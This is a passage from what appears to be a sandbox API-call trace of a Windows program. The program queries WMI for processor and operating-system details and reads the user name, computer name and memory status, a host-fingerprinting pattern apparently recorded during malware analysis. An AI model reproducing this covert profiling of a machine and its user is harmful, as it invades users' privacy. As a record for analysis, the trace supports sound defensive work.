wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2314ed4*=0, plFlavor=0x2314ed8*=0 | out: pVal=0x19f358*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz", varVal2=0x0), pType=0x2314ed4*=8, plFlavor=0x2314ed8*=0) returned 0x0 [0185.916] SysStringByteLen (bstr="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 0x4e [0185.916] SysStringByteLen (bstr="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 0x4e [0185.916] IWbemClassObject:Get (in: This=0x5d4470, wszName="Name", lFlags=0, pVal=0x19f360*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2314ed4*=8, plFlavor=0x2314ed8*=0 | out: pVal=0x19f360*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz", varVal2=0x0), pType=0x2314ed4*=8, plFlavor=0x2314ed8*=0) returned 0x0 [0185.917] SysStringByteLen (bstr="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 0x4e [0185.917] SysStringByteLen (bstr="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 0x4e [0185.917] CoTaskMemAlloc (cb=0x4) returned 0x596ee8 [0185.917] IEnumWbemClassObject:Next (in: This=0x599d30, lTimeout=-1, uCount=0x1, apObjects=0x596ee8, puReturned=0x231466c | out: apObjects=0x596ee8*=0x0, puReturned=0x231466c*=0x0) returned 0x1 [0185.918] CoTaskMemFree (pv=0x596ee8) [0185.918] CoGetContextToken (in: pToken=0x19f280 | out: pToken=0x19f280) returned 0x0 [0185.919] WbemLocator:IUnknown:Release (This=0x5af430) returned 0x1 [0185.919] IUnknown:Release (This=0x599d30) returned 0x0 [0185.923] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594510, puCount=0x19f398 | out: puCount=0x19f398*=0x2) returned 0x0 [0185.923] WbemDefPath:IWbemPath:GetText (in: This=0x594510, lFlags=4, puBuffLength=0x19f394*=0x0, pszText=0x0 | out: puBuffLength=0x19f394*=0xf, pszText=0x0) returned 0x0 [0185.923] WbemDefPath:IWbemPath:GetText (in: This=0x594510, lFlags=4, puBuffLength=0x19f394*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f394*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0185.952] GlobalMemoryStatusEx (in: lpBuffer=0x2315110 | out: lpBuffer=0x2315110) returned 1 [0186.359] GetUserNameW (in: lpBuffer=0x19f1b4, pcbBuffer=0x2316220 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x2316220) returned 1 [0186.359] GetComputerNameW (in: lpBuffer=0x19f1b4, nSize=0x2316760 | out: lpBuffer="XC64ZB", nSize=0x2316760) returned 1 [0186.360] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594510, puCount=0x19f388 | out: puCount=0x19f388*=0x2) returned 0x0 [0186.360] WbemDefPath:IWbemPath:GetText (in: This=0x594510, lFlags=4, puBuffLength=0x19f384*=0x0, pszText=0x0 | out: puBuffLength=0x19f384*=0xf, pszText=0x0) returned 0x0 [0186.360] WbemDefPath:IWbemPath:GetText (in: This=0x594510, lFlags=4, puBuffLength=0x19f384*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f384*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0186.360] IWbemClassObject:Get (in: This=0x5a5978, wszName="Name", lFlags=0, pVal=0x19f384*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2316c10*=0, plFlavor=0x2316c14*=0 | out: pVal=0x19f384*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Microsoft Windows 10 Pro|C:\\Windows|\\Device\\Harddisk0\\Partition1", varVal2=0x0), pType=0x2316c10*=8, plFlavor=0x2316c14*=0) returned 0x0 [0186.360] SysStringByteLen (bstr="Microsoft Windows 10 Pro|C:\\Windows|\\Device\\Harddisk0\\Partition1") returned 0x80 [0186.360] SysStringByteLen (bstr="Microsoft Windows 10 Pro|C:\\Windows|\\Device\\Harddisk0\\Partition1") returned 0x80 [0186.360] IWbemClassObject:Get (in: This=0x5a5978, wszName="Name", lFlags=0, pVal=0x19f38c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2316c10*=8, plFlavor=0x2316c14*=0 | out: pVal=0x19f38c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Microsoft Windows 10 Pro|C:\\Windows|\\Device\\Harddisk0\\Partition1", varVal2=0x0), pType=0x2316c10*=8, plFlavor=0x2316c14*=0) returned 0x0 [0186.361] SysStringByteLen (bstr="Microsoft Windows 10 Pro|C:\\Windows|\\Device\\Harddisk0\\Partition1") returned 0x80 [0186.361] SysStringByteLen (bstr="Microsoft Windows 10 Pro|C:\\Windows|\\Device\\Harddisk0\\Partition1") returned 0x80 [0186.361] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594510, puCount=0x19f3a0 | out: puCount=0x19f3a0*=0x2) returned 0x0 [0186.361] WbemDefPath:IWbemPath:GetText (in: This=0x594510, lFlags=4, puBuffLength=0x19f39c*=0x0, pszText=0x0 | out: puBuffLength=0x19f39c*=0xf, pszText=0x0) returned 0x0 [0186.361] WbemDefPath:IWbemPath:GetText (in: This=0x594510, lFlags=4, puBuffLength=0x19f39c*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f39c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0186.408] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x19f248*=0x3e8, lpdwindex=0x19f0fc | out: lpdwindex=0x19f0fc) returned 0x0 [0186.482] CoGetContextToken (in: pToken=0x19f008 | out: pToken=0x19f008) returned 0x0 [0186.482] CoGetContextToken (in: pToken=0x19efb0 | out: pToken=0x19efb0) returned 0x0 [0186.482] IUnknown:QueryInterface (in: This=0x524148, riid=0x6948da0c*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ef8c | out: ppvObject=0x19ef8c*=0x524158) returned 0x0 [0186.483] CObjectContext::ContextCallback () returned 0x0 [0186.484] IUnknown:Release (This=0x524158) returned 0x1 [0186.484] CoUnmarshalInterface (in: pStm=0x580580, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19effc | out: ppv=0x19effc*=0x5af430) returned 0x0 [0186.485] CoMarshalInterface (pStm=0x580580, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x5af430, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0) returned 0x0 [0186.485] WbemLocator:IUnknown:QueryInterface (in: This=0x5af430, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ee9c | out: ppvObject=0x19ee9c*=0x5af430) returned 0x0 [0186.485] WbemLocator:IUnknown:QueryInterface (in: This=0x5af430, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ee58 | out: ppvObject=0x19ee58*=0x0) returned 0x80004002 [0186.486] WbemLocator:IUnknown:QueryInterface (in: This=0x5af430, riid=0x69519bb4*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ec74 | out: ppvObject=0x19ec74*=0x0) returned 0x80004002 [0186.486] WbemLocator:IUnknown:QueryInterface (in: This=0x5af430, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19ea4c | out: ppvObject=0x19ea4c*=0x0) returned 0x80004002 [0186.486] WbemLocator:IUnknown:AddRef (This=0x5af430) returned 0x3 [0186.486] WbemLocator:IUnknown:QueryInterface (in: This=0x5af430, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e7ac | out: ppvObject=0x19e7ac*=0x0) returned 0x80004002 [0186.486] WbemLocator:IUnknown:QueryInterface (in: This=0x5af430, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e75c | out: ppvObject=0x19e75c*=0x0) returned 0x80004002 [0186.486] WbemLocator:IUnknown:QueryInterface (in: This=0x5af430, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e768 | out: ppvObject=0x19e768*=0x5af38c) returned 0x0 [0186.487] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x5af38c, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e770 | out: pCid=0x19e770*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0186.487] WbemLocator:IUnknown:Release (This=0x5af38c) returned 0x3 [0186.487] CoGetContextToken (in: pToken=0x19e7c8 | out: pToken=0x19e7c8) returned 0x0 [0186.487] CoGetContextToken (in: pToken=0x19ebd0 | out: pToken=0x19ebd0) returned 0x0 [0186.487] WbemLocator:IUnknown:QueryInterface (in: This=0x5af430, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ec5c | out: ppvObject=0x19ec5c*=0x5af414) returned 0x0 [0186.487] WbemLocator:IRpcOptions:Query (in: This=0x5af414, pPrx=0x5af430, dwProperty=2, pdwValue=0x19ec68 | out: pdwValue=0x19ec68) returned 0x0 [0186.487] WbemLocator:IUnknown:Release (This=0x5af414) returned 0x3 [0186.487] WbemLocator:IUnknown:Release (This=0x5af430) returned 0x2 [0186.487] WbemLocator:IUnknown:Release (This=0x5af430) returned 0x1 [0186.487] CoGetContextToken (in: pToken=0x19ef48 | out: pToken=0x19ef48) returned 0x0 [0186.487] WbemLocator:IUnknown:AddRef (This=0x5af430) returned 0x2 [0186.487] WbemLocator:IUnknown:QueryInterface (in: This=0x5af430, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f200 | out: ppvObject=0x19f200*=0x5af40c) returned 0x0 [0186.487] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x5af40c, pProxy=0x5af430, pAuthnSvc=0x19f250, pAuthzSvc=0x19f24c, pServerPrincName=0x19f244, pAuthnLevel=0x19f248, pImpLevel=0x19f238, pAuthInfo=0x19f23c, pCapabilites=0x19f240 | out: pAuthnSvc=0x19f250*=0xa, pAuthzSvc=0x19f24c*=0x0, pServerPrincName=0x19f244, pAuthnLevel=0x19f248*=0x6, pImpLevel=0x19f238*=0x2, pAuthInfo=0x19f23c, pCapabilites=0x19f240*=0x1) returned 0x0 [0186.488] WbemLocator:IUnknown:Release (This=0x5af40c) returned 0x2 [0186.488] WbemLocator:IUnknown:QueryInterface (in: This=0x5af430, riid=0x65a61224*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f1f4 | out: ppvObject=0x19f1f4*=0x5af430) returned 0x0 [0186.488] WbemLocator:IUnknown:QueryInterface (in: This=0x5af430, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f1e0 | out: ppvObject=0x19f1e0*=0x5af40c) returned 0x0 [0186.488] WbemLocator:IClientSecurity:SetBlanket (This=0x5af40c, pProxy=0x5af430, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0186.510] WbemLocator:IUnknown:Release (This=0x5af40c) returned 0x3 [0186.510] WbemLocator:IUnknown:Release (This=0x5af430) returned 0x2 [0186.510] CoTaskMemFree (pv=0x598e88) [0186.510] WbemLocator:IUnknown:Release (This=0x5af430) returned 0x1 [0186.510] SysStringLen (param_1=0x0) returned 0x0 [0186.510] CoGetContextToken (in: pToken=0x19f1c0 | out: pToken=0x19f1c0) returned 0x0 [0186.510] CoGetContextToken (in: pToken=0x19f120 | out: pToken=0x19f120) returned 0x0 [0186.510] WbemLocator:IUnknown:QueryInterface (in: This=0x5af430, riid=0x19f1f0*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x19f1ec | out: ppvObject=0x19f1ec*=0x57d730) returned 0x0 [0186.511] WbemLocator:IUnknown:AddRef (This=0x57d730) returned 0x3 [0186.511] WbemLocator:IUnknown:Release (This=0x57d730) returned 0x2 [0186.511] CoGetContextToken (in: pToken=0x19f180 | out: pToken=0x19f180) returned 0x0 [0186.511] WbemLocator:IUnknown:AddRef (This=0x57d730) returned 0x3 [0186.511] WbemLocator:IUnknown:QueryInterface (in: This=0x57d730, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f200 | out: ppvObject=0x19f200*=0x5af40c) returned 0x0 [0186.512] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x5af40c, pProxy=0x57d730, pAuthnSvc=0x19f250, pAuthzSvc=0x19f24c, pServerPrincName=0x19f244, pAuthnLevel=0x19f248, pImpLevel=0x19f238, pAuthInfo=0x19f23c, pCapabilites=0x19f240 | out: pAuthnSvc=0x19f250*=0xa, pAuthzSvc=0x19f24c*=0x0, pServerPrincName=0x19f244, pAuthnLevel=0x19f248*=0x6, pImpLevel=0x19f238*=0x2, pAuthInfo=0x19f23c, pCapabilites=0x19f240*=0x1) returned 0x0 [0186.512] WbemLocator:IUnknown:Release (This=0x5af40c) returned 0x3 [0186.512] WbemLocator:IUnknown:QueryInterface (in: This=0x57d730, riid=0x65a61224*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f1f4 | out: ppvObject=0x19f1f4*=0x5af430) returned 0x0 [0186.512] WbemLocator:IUnknown:QueryInterface (in: This=0x57d730, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f1e0 | out: ppvObject=0x19f1e0*=0x5af40c) returned 0x0 [0186.512] WbemLocator:IClientSecurity:SetBlanket (This=0x5af40c, pProxy=0x57d730, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0186.512] WbemLocator:IUnknown:Release (This=0x5af40c) returned 0x4 [0186.512] WbemLocator:IUnknown:Release (This=0x5af430) returned 0x3 [0186.512] CoTaskMemFree (pv=0x598ee8) [0186.512] WbemLocator:IUnknown:Release (This=0x57d730) returned 0x2 [0186.512] SysStringLen (param_1=0x0) returned 0x0 [0186.512] CoGetContextToken (in: pToken=0x19f100 | out: pToken=0x19f100) returned 0x0 [0186.512] WbemLocator:IUnknown:AddRef (This=0x57d730) returned 0x3 [0186.512] IWbemServices:ExecQuery (in: This=0x57d730, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Processor", lFlags=16, pCtx=0x0, ppEnum=0x19f310 | out: ppEnum=0x19f310*=0x59a500) returned 0x0 [0186.642] IUnknown:QueryInterface (in: This=0x59a500, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f16c | out: ppvObject=0x19f16c*=0x59a504) returned 0x0 [0186.643] IClientSecurity:QueryBlanket (in: This=0x59a504, pProxy=0x59a500, pAuthnSvc=0x19f1bc, pAuthzSvc=0x19f1b8, pServerPrincName=0x19f1b0, pAuthnLevel=0x19f1b4, pImpLevel=0x19f1a4, pAuthInfo=0x19f1a8, pCapabilites=0x19f1ac | out: pAuthnSvc=0x19f1bc*=0xa, pAuthzSvc=0x19f1b8*=0x0, pServerPrincName=0x19f1b0, pAuthnLevel=0x19f1b4*=0x6, pImpLevel=0x19f1a4*=0x2, pAuthInfo=0x19f1a8, pCapabilites=0x19f1ac*=0x1) returned 0x0 [0186.643] IUnknown:Release (This=0x59a504) returned 0x1 [0186.643] IUnknown:QueryInterface (in: This=0x59a500, riid=0x65a61224*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f160 | out: ppvObject=0x19f160*=0x5afa30) returned 0x0 [0186.643] IUnknown:QueryInterface (in: This=0x59a500, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f14c | out: ppvObject=0x19f14c*=0x59a504) returned 0x0 [0186.643] IClientSecurity:SetBlanket (This=0x59a504, pProxy=0x59a500, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0186.648] IUnknown:Release (This=0x59a504) returned 0x2 [0186.648] WbemLocator:IUnknown:Release (This=0x5afa30) returned 0x1 [0186.648] CoTaskMemFree (pv=0x598df8) [0186.649] IUnknown:QueryInterface (in: This=0x59a500, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed58 | out: ppvObject=0x19ed58*=0x5afa30) returned 0x0 [0186.649] WbemLocator:IUnknown:QueryInterface (in: This=0x5afa30, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ed14 | out: ppvObject=0x19ed14*=0x0) returned 0x80004002 [0186.649] WbemLocator:IUnknown:QueryInterface (in: This=0x5afa30, riid=0x69519bb4*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19eb34 | out: ppvObject=0x19eb34*=0x0) returned 0x80004002 [0186.650] IUnknown:QueryInterface (in: This=0x59a500, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e90c | out: ppvObject=0x19e90c*=0x0) returned 0x80004002 [0186.650] WbemLocator:IUnknown:AddRef (This=0x5afa30) returned 0x3 [0186.650] WbemLocator:IUnknown:QueryInterface (in: This=0x5afa30, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e66c | out: ppvObject=0x19e66c*=0x0) returned 0x80004002 [0186.650] WbemLocator:IUnknown:QueryInterface (in: This=0x5afa30, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0186.650] WbemLocator:IUnknown:QueryInterface (in: This=0x5afa30, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e628 | out: ppvObject=0x19e628*=0x5af98c) returned 0x0 [0186.651] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x5af98c, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e630 | out: pCid=0x19e630*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0186.651] WbemLocator:IUnknown:Release (This=0x5af98c) returned 0x3 [0186.651] CoGetContextToken (in: pToken=0x19e688 | out: pToken=0x19e688) returned 0x0 [0186.651] CoGetContextToken (in: pToken=0x19ea90 | out: pToken=0x19ea90) returned 0x0 [0186.651] WbemLocator:IUnknown:QueryInterface (in: This=0x5afa30, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eb1c | out: ppvObject=0x19eb1c*=0x5afa14) returned 0x0 [0186.651] WbemLocator:IRpcOptions:Query (in: This=0x5afa14, pPrx=0x5afa30, dwProperty=2, pdwValue=0x19eb28 | out: pdwValue=0x19eb28) returned 0x80004002 [0186.651] WbemLocator:IUnknown:Release (This=0x5afa14) returned 0x3 [0186.651] WbemLocator:IUnknown:Release (This=0x5afa30) returned 0x2 [0186.651] CoGetContextToken (in: pToken=0x19f068 | out: pToken=0x19f068) returned 0x0 [0186.651] CoGetContextToken (in: pToken=0x19efc8 | out: pToken=0x19efc8) returned 0x0 [0186.651] WbemLocator:IUnknown:QueryInterface (in: This=0x5afa30, riid=0x19f098*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x19f094 | out: ppvObject=0x19f094*=0x59a500) returned 0x0 [0186.651] IUnknown:AddRef (This=0x59a500) returned 0x4 [0186.651] IUnknown:Release (This=0x59a500) returned 0x3 [0186.651] IUnknown:Release (This=0x59a500) returned 0x2 [0186.651] WbemLocator:IUnknown:Release (This=0x57d730) returned 0x2 [0186.651] SysStringLen (param_1=0x0) returned 0x0 [0186.651] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594510, puCount=0x19f35c | out: puCount=0x19f35c*=0x2) returned 0x0 [0186.651] WbemDefPath:IWbemPath:GetText (in: This=0x594510, lFlags=4, puBuffLength=0x19f358*=0x0, pszText=0x0 | out: puBuffLength=0x19f358*=0xf, pszText=0x0) returned 0x0 [0186.652] WbemDefPath:IWbemPath:GetText (in: This=0x594510, lFlags=4, puBuffLength=0x19f358*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f358*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0186.652] CoGetContextToken (in: pToken=0x19f1a8 | out: pToken=0x19f1a8) returned 0x0 [0186.652] IUnknown:AddRef (This=0x59a500) returned 0x3 [0186.652] IEnumWbemClassObject:Clone (in: This=0x59a500, ppEnum=0x19f368 | out: ppEnum=0x19f368*=0x599d30) returned 0x0 [0186.653] IUnknown:QueryInterface (in: This=0x599d30, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f224 | out: ppvObject=0x19f224*=0x599d34) returned 0x0 [0186.653] IClientSecurity:QueryBlanket (in: This=0x599d34, pProxy=0x599d30, pAuthnSvc=0x19f274, pAuthzSvc=0x19f270, pServerPrincName=0x19f268, pAuthnLevel=0x19f26c, pImpLevel=0x19f25c, pAuthInfo=0x19f260, pCapabilites=0x19f264 | out: pAuthnSvc=0x19f274*=0xa, pAuthzSvc=0x19f270*=0x0, pServerPrincName=0x19f268, pAuthnLevel=0x19f26c*=0x6, pImpLevel=0x19f25c*=0x2, pAuthInfo=0x19f260, pCapabilites=0x19f264*=0x1) returned 0x0 [0186.653] IUnknown:Release (This=0x599d34) returned 0x1 [0186.653] IUnknown:QueryInterface (in: This=0x599d30, riid=0x65a61224*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f218 | out: ppvObject=0x19f218*=0x5b0f30) returned 0x0 [0186.653] IUnknown:QueryInterface (in: This=0x599d30, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f204 | out: ppvObject=0x19f204*=0x599d34) returned 0x0 [0186.653] IClientSecurity:SetBlanket (This=0x599d34, pProxy=0x599d30, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0186.655] IUnknown:Release (This=0x599d34) returned 0x2 [0186.655] WbemLocator:IUnknown:Release (This=0x5b0f30) returned 0x1 [0186.655] CoTaskMemFree (pv=0x598df8) [0186.655] IUnknown:QueryInterface (in: This=0x599d30, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ee00 | out: ppvObject=0x19ee00*=0x5b0f30) returned 0x0 [0186.655] WbemLocator:IUnknown:QueryInterface (in: This=0x5b0f30, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19edbc | out: ppvObject=0x19edbc*=0x0) returned 0x80004002 [0186.656] WbemLocator:IUnknown:QueryInterface (in: This=0x5b0f30, riid=0x69519bb4*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ebdc | out: ppvObject=0x19ebdc*=0x0) returned 0x80004002 [0186.656] IUnknown:QueryInterface (in: This=0x599d30, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, 